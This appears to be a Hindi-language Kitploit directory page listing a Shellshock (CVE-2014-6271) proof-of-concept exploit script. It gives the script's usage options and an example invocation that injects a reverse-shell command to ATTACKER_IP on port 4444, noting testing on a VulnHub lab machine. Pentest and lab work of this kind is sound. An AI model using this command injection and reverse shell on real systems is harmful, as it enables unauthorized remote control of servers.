Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-6271-Shellshock — CVE-2014-6271 शोषण | infrar3d द्वारा | Kitploit
उपकरण/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

CVE-2014-6271 शोषण | infrar3d द्वारा

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-6271 Shellshock

द्वारा शोषित infrar3d

यह रिपॉजिटरी CVE-2014-6271 (Shellshock) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल करता है।

Shellshock GNU Bash में एक गंभीर कमजोरी है जहाँ विशेष रूप से तैयार किए गए पर्यावरण चर मनमाना कमांड निष्पादन की अनुमति देते हैं।
जब कोई वेब सर्वर CGI स्क्रिप्ट में HTTP हेडर भेजता है जो Bash को आमंत्रित करती हैं, तो हमलावर उन हेडर के माध्यम से कमांड इंजेक्ट कर सकता है।

उपयोग:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	print this message and exit
	-a | --address	target address (default is "localhost")
	-p | --port	target port (default is 80)
	-f | --file	target file (default is "/cgi-bin/shell.sh")
	-c | --command	command to execute on the target machine (default is "id")

उदाहरण:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(VulnHub मशीन "Hacksudo - Thor" पर परीक्षण किया गया)

⚠️ अस्वीकरण ⚠️

यह सॉफ्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

  • लेखक इस प्रोग्राम के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
  • स्पष्ट पूर्व अनुमति के बिना किसी भी सिस्टम पर उपयोग न करें।
  • सहमति के बिना लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है।

आप सभी लागू कानूनों का पालन करने के लिए जिम्मेदार हैं। नैतिक और जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें